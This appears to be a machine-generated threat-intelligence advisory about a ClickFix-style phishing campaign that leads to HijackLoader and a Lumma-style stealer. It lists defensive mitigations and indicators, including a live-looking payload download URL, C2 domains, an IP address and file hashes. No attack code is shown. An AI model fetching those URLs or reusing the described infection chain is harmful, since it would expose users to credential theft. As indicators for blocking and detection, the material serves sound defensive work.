User interaction with a ClickFix-style phishing site resulted in execution of an obfuscated PowerShell command
A phishing campaign mimicking ClickFix tricks users into running obfuscated PowerShell commands that download and install a malicious MSI payload. The attack chain uses DLL sideloading with renamed legitimate binaries to execute malware components. The final payload, HijackLoader, delivers a Lumma-style information stealer aimed at harvesting credentials and exfiltrating data. The campaign uses multiple command-and-control domains and specific IP infrastructure. Mitigation includes blocking known indicators, raising user awareness about this phishing tactic, detecting suspicious PowerShell and DLL sideloading activity, and isolating affected systems for remediation.
AI Analysis
Technical Summary
This threat involves a multi-stage phishing attack leveraging social engineering to convince users to execute obfuscated PowerShell commands. These commands download and install a malicious MSI file from a remote server. The infection chain employs DLL sideloading techniques by renaming legitimate binaries to load malicious DLLs, enabling stealthy execution of malware components. The final stage deploys HijackLoader, which delivers a Lumma-style information stealer designed to harvest credentials and exfiltrate sensitive data. The campaign infrastructure includes multiple command-and-control domains and IP addresses such as 85.11.161.198 and domains like robinhuds.com. Indicators include hashes of malicious files and URLs used in the attack. No official patch or fix is applicable as this is a malware campaign relying on user interaction and social engineering.
Potential Impact
Successful execution leads to installation of malware capable of credential theft and data exfiltration. The infection chain uses advanced DLL sideloading to evade detection, increasing the risk of persistent compromise. Credential theft can facilitate further unauthorized access and lateral movement within affected environments. The campaign's use of multiple C2 domains and IPs complicates detection and blocking efforts.
Mitigation Recommendations
No official patch is applicable since this is a social engineering and malware infection campaign. Recommended mitigations include blocking the identified IP addresses, domains, URLs, and file hashes associated with the campaign. Enhance user training to recognize ClickFix-style phishing tactics and avoid executing unsolicited PowerShell commands. Implement endpoint detection and response (EDR) capabilities to monitor for suspicious PowerShell activity and unsigned DLL sideloading behavior. Isolate and remediate compromised systems promptly to prevent further data loss or spread.
Indicators of Compromise
- ip: 85.11.161.198
- hash: f31a8953531ffb5c14e2d8347e283e1f8f3c732a5a9a68f611c96f4730e8a7dc
- hash: c529217014b732abbe646046c07ce8f0366a42051839d4cb3be5b400285fc728
- url: http://robinhuds.com:9658/
- url: http://85.11.161.198:6600/qffww8ph/2DTYOKUEN.msi
- hash: 818daf975f78ac30ba4ce0fdd2f7eb550cdc16701da35594e8c9cba72bc84a5c
- hash: b07a03883675654088a2b56a80933ca8
- hash: b6a201726b44106a7dbe93a480b38420
- hash: fa1f2ac9172702ad10c24f0a637c26cd
- hash: 10dfd71cf61ea3c1621a5b0c08c3b034773fb84b
- hash: 7450731c0baf5befb79966a6be7873a5b1a62a7a
- hash: b374d1715148bc80394b844d9f008adfa5585d65
- domain: robinhuds.com
User interaction with a ClickFix-style phishing site resulted in execution of an obfuscated PowerShell command
Description
A phishing campaign mimicking ClickFix tricks users into running obfuscated PowerShell commands that download and install a malicious MSI payload. The attack chain uses DLL sideloading with renamed legitimate binaries to execute malware components. The final payload, HijackLoader, delivers a Lumma-style information stealer aimed at harvesting credentials and exfiltrating data. The campaign uses multiple command-and-control domains and specific IP infrastructure. Mitigation includes blocking known indicators, raising user awareness about this phishing tactic, detecting suspicious PowerShell and DLL sideloading activity, and isolating affected systems for remediation.
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
This threat involves a multi-stage phishing attack leveraging social engineering to convince users to execute obfuscated PowerShell commands. These commands download and install a malicious MSI file from a remote server. The infection chain employs DLL sideloading techniques by renaming legitimate binaries to load malicious DLLs, enabling stealthy execution of malware components. The final stage deploys HijackLoader, which delivers a Lumma-style information stealer designed to harvest credentials and exfiltrate sensitive data. The campaign infrastructure includes multiple command-and-control domains and IP addresses such as 85.11.161.198 and domains like robinhuds.com. Indicators include hashes of malicious files and URLs used in the attack. No official patch or fix is applicable as this is a malware campaign relying on user interaction and social engineering.
Potential Impact
Successful execution leads to installation of malware capable of credential theft and data exfiltration. The infection chain uses advanced DLL sideloading to evade detection, increasing the risk of persistent compromise. Credential theft can facilitate further unauthorized access and lateral movement within affected environments. The campaign's use of multiple C2 domains and IPs complicates detection and blocking efforts.
Mitigation Recommendations
No official patch is applicable since this is a social engineering and malware infection campaign. Recommended mitigations include blocking the identified IP addresses, domains, URLs, and file hashes associated with the campaign. Enhance user training to recognize ClickFix-style phishing tactics and avoid executing unsolicited PowerShell commands. Implement endpoint detection and response (EDR) capabilities to monitor for suspicious PowerShell activity and unsigned DLL sideloading behavior. Isolate and remediate compromised systems promptly to prevent further data loss or spread.
Technical Details
- Author
- AlienVault
- Tlp
- white
- References
- []
- Adversary
- null
- Pulse Id
- 69f1de85544538ce8b03332a
- Threat Score
- null
Indicators of Compromise
Ip
| Value | Description | Copy |
|---|---|---|
ip85.11.161.198 | — |
Hash
| Value | Description | Copy |
|---|---|---|
hashf31a8953531ffb5c14e2d8347e283e1f8f3c732a5a9a68f611c96f4730e8a7dc | — | |
hashc529217014b732abbe646046c07ce8f0366a42051839d4cb3be5b400285fc728 | — | |
hash818daf975f78ac30ba4ce0fdd2f7eb550cdc16701da35594e8c9cba72bc84a5c | — | |
hashb07a03883675654088a2b56a80933ca8 | — | |
hashb6a201726b44106a7dbe93a480b38420 | — | |
hashfa1f2ac9172702ad10c24f0a637c26cd | — | |
hash10dfd71cf61ea3c1621a5b0c08c3b034773fb84b | — | |
hash7450731c0baf5befb79966a6be7873a5b1a62a7a | — | |
hashb374d1715148bc80394b844d9f008adfa5585d65 | — |
Url
| Value | Description | Copy |
|---|---|---|
urlhttp://robinhuds.com:9658/ | — | |
urlhttp://85.11.161.198:6600/qffww8ph/2DTYOKUEN.msi | — |
Domain
| Value | Description | Copy |
|---|---|---|
domainrobinhuds.com | — |
Threat ID: 69f1e2aacbff5d8610f7a27f
Added to database: 4/29/2026, 10:51:22 AM
Last enriched: 4/29/2026, 11:08:12 AM
Last updated: 4/29/2026, 8:56:25 PM
Views: 47
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.